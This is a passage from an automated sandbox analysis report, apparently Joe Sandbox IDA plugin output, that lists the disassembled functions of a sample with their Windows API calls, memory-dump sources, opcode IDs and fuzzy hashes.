                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
                                                                                                                                                                                                                                                                                  • Instruction ID: 61e468b5036a30d6efaf6b47ddc7ed5066fe67bdcd5590bee8117868e3b393a0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 344196227096C151F7697B6298112FEEB91FF44B94F980034EE8D06696CF3CE480CBB1
                                                                                                                                                                                                                                                                                  Function 00007FF72F5E0E70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(@=},00000000,?,00007FF72F5BE7B5,?,?,0000000100000001,00007FF72F5CCA48), ref: 00007FF72F5E0F49
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(@=},00000000,?,00007FF72F5BE7B5,?,?,0000000100000001,00007FF72F5CCA48), ref: 00007FF72F5E0F66
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(@=},00000000,?,00007FF72F5BE7B5,?,?,0000000100000001,00007FF72F5CCA48), ref: 00007FF72F5E0F81
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(@=},00000000,?,00007FF72F5BE7B5,?,?,0000000100000001,00007FF72F5CCA48), ref: 00007FF72F5E0F9A
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
                                                                                                                                                                                                                                                                                  • Instruction ID: 5a84dc2a4054867d55997e769e2a6f12d094b96c81da4381a78b552bdfc28452
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3041E421B0D6C291EA61AB5299403F9EBA0FF44F54F991434DE9C17785CF7CE491CBA0
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A5260 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 510365852-3916222277
                                                                                                                                                                                                                                                                                  • Opcode ID: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
                                                                                                                                                                                                                                                                                  • Instruction ID: 484edc208d74f2f7e31e9a85f61bb9ea5c97108473357ce7191be7956e3557c5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14117972A09B818AD760EF26B8401DAB361FB447B4F544339E6BD0BAD6CF78D0528B00
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D6730 Relevance: 7.6, APIs: 6, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
                                                                                                                                                                                                                                                                                  • Instruction ID: 4686da199e1de0bfe24c6aed951698a087b42841a675889db1effe9e1d687e60
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14612925B09AC286EA50AF16EC803F5E3A0EF59BA4FD40536D95C43766DF3CE0468F61
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D1A50 Relevance: 7.6, APIs: 6, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
                                                                                                                                                                                                                                                                                  • Instruction ID: fb87535062d50ed4d9e6bea03c3ff770c8c576e9fb2aeaf3869b08acc9172a62
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E451EA25B09AC682FA60AB11EC803F5F3A4FFA8794FD40536C99D43766DE7CE0548B61
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A3540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFailFastRaise
                                                                                                                                                                                                                                                                                  • String ID: Process is terminating due to StackOverflowException.
                                                                                                                                                                                                                                                                                  • API String ID: 2546344036-2200901744
                                                                                                                                                                                                                                                                                  • Opcode ID: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
                                                                                                                                                                                                                                                                                  • Instruction ID: 549b83c45e0c7e2e05fb398afbbe2eadaf8ca3c0d3fb83a95cc76deb70195513
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7517125B0A6C281FE54AB16EC503F8A391EF48B98FC45536DA1E477A0DF2EE4658B10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5E0570 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
                                                                                                                                                                                                                                                                                  • Instruction ID: 427e01b7c9a6ed5e221826c2a37d6f75fd0172664f37757e8c54a24e27b61659
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5418232B097C685EF60AF66D8407B9B291EF41F94F94913ADE4E46789DE3CE4408F60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CF280 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,00000000,?,00007FF72F5CB16E,?,?,-8000000000000000,00007FF72F5DE9AE,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5CF339
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,00000000,?,00007FF72F5CB16E,?,?,-8000000000000000,00007FF72F5DE9AE,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5CF356
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,00000000,?,00007FF72F5CB16E,?,?,-8000000000000000,00007FF72F5DE9AE,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5CF376
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,00000000,?,00007FF72F5CB16E,?,?,-8000000000000000,00007FF72F5DE9AE,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5CF399
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
                                                                                                                                                                                                                                                                                  • Instruction ID: 948676e64f81ae9ebbf28868a25f254e4d72c2bc16ffe0f4fd0634534de302ee
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 513160227097C292EA64AF56A8402F9E6E4FF44F94F984035DA4E0BB95CF7CE451CB70
                                                                                                                                                                                                                                                                                  Function 00007FF72F5AB520 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72F5A53F1), ref: 00007FF72F5AB554
                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72F5A53F1), ref: 00007FF72F5AB55E
                                                                                                                                                                                                                                                                                  • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72F5A53F1), ref: 00007FF72F5AB57D
                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72F5A53F1), ref: 00007FF72F5AB591
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMultipleWait$HandlesObjects
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2817213684-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
                                                                                                                                                                                                                                                                                  • Instruction ID: b31ee0ba62afdf877b1a4b9af521297fa8426592eb90c235f67b30e0a535047c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB117031B0CA9592D7245B2AF80416AF2A5FB88B94F940139FE8E53B96DF3CD4108F50
                                                                                                                                                                                                                                                                                  Function 00007FF72F60B27C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
                                                                                                                                                                                                                                                                                  • Instruction ID: 47b22b8b6ca2d434a22c611b9e2468dad3e844f28bc0564fccca605cb2c9edc6
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2115A26B14F428AEB00DF60EC542B873A8FB19758F840E35EE6D82BA4DF38D154C750
                                                                                                                                                                                                                                                                                  Function 00007FF72F60C658 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F60B963), ref: 00007FF72F60C6A8
                                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F60B963), ref: 00007FF72F60C6E9
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                  • Opcode ID: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
                                                                                                                                                                                                                                                                                  • Instruction ID: 8db53a4b3a9e5d5564740b8151fe7172a263c36589b88b84a11b3da9bf7bfeee
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16113332718B8182DB219F15F8402A9B7EAFB88B84F584635EE8D07754DF3DD555CB00
                                                                                                                                                                                                                                                                                  Function 00007FF72F5AD050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
